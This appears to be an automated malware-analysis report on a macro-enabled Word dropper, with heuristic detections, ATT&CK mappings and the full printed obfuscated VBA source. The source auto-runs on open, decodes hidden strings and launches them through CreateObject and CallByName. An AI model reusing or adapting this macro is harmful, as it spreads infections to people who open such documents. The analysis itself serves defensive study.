Verdict: MALICIOUS
Risk Score: 290

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1140 Deobfuscate or Obfuscate Malicious Files or Information
The sample is a malicious Office document containing VBA macros. The 'AutOOpen' macro is designed to execute automatically when the document is opened, and the 'SE_ENABLE_LURE' heuristic indicates the document prompts the user to enable macros. The VBA code appears to be obfuscated, but the presence of 'CreateObject' and 'CallByName' suggests it is attempting to execute code, likely to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6481603-0' further supports its nature as a dropper.
Heuristics (10)

- ClamAV: Doc.Dropper.Agent-6481603-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6481603-0
- Heap-spray pattern detected (high, SC_HEAP_SPRAY): Repeated 0x04 bytes found
  Disassembly: attempted x86 opcode disassembly of the repeated-byte region.
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script:
  Private Sub paulstorm_Change()
  Set guilecla = CreateObject(tunzhuan)
  volvos70 = 87 * 16
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call. Matched lines in script:
  mn1 = True
  CallByName emera777, mn, VbMethod, sitiakuloP.paulstorm, mn0, mn1
  End Sub
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:
  Attribute VB_Customizable = True
  Sub AutOOpen()
  pataccess
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7236 bytes | b425dd209cb76dcf045c9bed4a930e552a16739873f96c9d74b9f0db6b2f2c32 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
pataccess
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
End Sub
Attribute VB_Name = "anilichs"
Function tunzhuan()
tunzhuan = ssegold1976
End Function
Function ssegold1976()
ssegold1976 = green3721(avosamenA.smarailg)
End Function
Function love123123()
love123123 = avonikhsaH.melissa158
End Function
Function gasmypoa(deenheit, diedligh)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
gasmypoa = green3721(sitiakuloP.yeahconnie) + deenheit + green3721(avosamenA.October100) + _
diedligh + green3721(sitiakuloP.linkskiing + sitiakuloP.ausjurer) + diedligh
End Function
Function redskin158()
redskin158 = "u.iaoghgEmaQRQai.uipEs/l"
End Function
Function golfroyals(AVORESSAB)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
golfroyals = green3721(wizard1971 + avosamenA.dreamdell) + AVORESSAB + _
green3721(avosamenA.avonayvele) + AVORESSAB + green3721(avonikhsaH.KONETEVS)
End Function
Sub sofiaaspasia(emera777)
mn = "Run"
mn0 = 0
mn1 = True
CallByName emera777, mn, VbMethod, sitiakuloP.paulstorm, mn0, mn1
End Sub
Function ANIBELAKHS()
ANIBELAKHS = sitiakuloP.loner_ru
End Function
Function green3721(pubitive)
wayact53 = ""
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
roupier43 = Len(pubitive)
For cjverm78 = 1 To roupier43
pat52082 = 108 + 97
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
wayact53 = wayact53 + duchylau(SOUTH407(pubitive, cjverm78), 4)
Next cjverm78
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
green3721 = wayact53
End Function
Function acTpoJIep(ziggysurf)
GHJYBWFN = robin459(9, 4) - 1
staivou5 = robin459(53, 1)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
love2582 = SOUTH407(love123123, staivou5)
For janearse = 2 To GHJYBWFN
staivou5 = robin459(27, 1)
pat52082 = 108 + 97
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
love2582 = love2582 + SOUTH407(ziggysurf, staivou5)
Next janearse
staivou5 = robin459(37, 1)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
acTpoJIep = ANIGREVOS(love2582, staivou5)
End Function
Attribute VB_Name = "avonikhsaH"
Attribute VB_Base = "0{C45A907D-3A63-4B6E-B210-20B309999378}{99CFF111-9347-474B-A9BC-83E074BC80B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub pamat7007_Change()
mikefuckme = acTpoJIep(carlfaith)
wqsbsteph = acTpoJIep(carlfaith)
HCIVOKHCIRTEP = acTpoJIep(osuucoos)
insidepa = acTpoJIep(osuucoos)
kathypercy = 89 + 32
kathypercy = 124 - 2
kathypercy = 74 * 139 + 17 + 7
kathypercy = kathypercy * 143 - 7
kathypercy = 5 - 89 - 13
oker1506 mikefuckme, wqsbsteph, HCIVOKHCIRTEP, insidepa
End Sub
Attribute VB_Name = "avosamenA"
Attribute VB_Base = "0{EEA0A116-C6C3-4531-9ECA-A3C133286C9D}{50C45D01-88EA-405E-90C0-96E7AF5936EE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "gb102456"
Function carlfaith()
carlfaith = avosamenA.canonbozo
End Function
Function osuucoos()
osuucoos = sitiakuloP.avonamsI
End Function
Sub pataccess()
Randomize
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
avonikhsaH.pamat7007 = "inosenig"
End Sub
Function saintbit(ftpgandalf, helpmeandy)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
saintbit = green3721(avosamenA.apodpani) + helpmeandy + green3721(avosamenA.eucarevi) + _
helpmeandy + green3721(avosamenA.rubygalaxy) + ftpgandalf + _
green3721(avosamenA.hvfdbh2018 + redskin158 + avosamenA.champsshit) + ftpgandalf + green3721(avosamenA.hvfdbh2018)
End Function
Function frontrugby()
frontrugby = avonikhsaH.password34
End Function
Function duchylau(applescout As String, blade333 As Integer) As String
Dim boufulad As Integer
boufulad = 0
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
For NELATNAP = 1 To 90
If (SOUTH407(frontrugby, NELATNAP) = applescout) Then
boufulad = NELATNAP
pat52082 = 108 + 97
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
Exit For
End If
Next NELATNAP
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
boufulad = IIf(boufulad - blade333 <= 0, 90 + boufulad - blade333, boufulad - blade333)
duchylau = SOUTH407(frontrugby, boufulad)
End Function
Function wizard1971()
wizard1971 = "smhoaiuEmaQE,uRQai.uipEs/l"
End Function
Function robin459(amuvampl, tOiRFJAxa)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
robin459 = ornchlol(Int((amuvampl * Rnd()) + tOiRFJAxa))
End Function
Function ornchlol(sertnanc)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
ornchlol = CInt(sertnanc)
End Function
Function oker1506(damian09, VEHSIBAK, udredboss, binkymegan)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
sitiakuloP.paulstorm = gasmypoa(damian09, VEHSIBAK) + saintbit(damian09, udredboss) + golfroyals(binkymegan)
End Function
Function SOUTH407(drolterr, bullorion)
SOUTH407 = Mid(drolterr, bullorion, 1)
End Function
Function ANIGREVOS(future200, Balumba)
ANIGREVOS = future200 + SOUTH407(ANIBELAKHS, Balumba)
End Function
Attribute VB_Name = "sitiakuloP"
Attribute VB_Base = "0{B541ABA7-4ECE-4CAF-94C0-153F68C799EB}{3ADA21AA-DA0E-48BB-B83B-451C8052760B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CheckBox1_Click()
MsgBox "Ok"
End Sub
Private Sub CommandButton1_Click()
MsgBox "Ok"
End Sub
Private Sub Label1_Click()
MsgBox "Ok"
End Sub
Private Sub paulstorm_Change()
Set guilecla = CreateObject(tunzhuan)
volvos70 = 87 * 16
volvos70 = volvos70 - volvos7
volvos70 = 97 * 142 - 2 - 63 - 10
volvos70 = volvos70 * volvos7
sofiaaspasia guilecla
End Sub
Private Sub ToggleButton1_Click()
MsgBox "Ok"
End Sub
```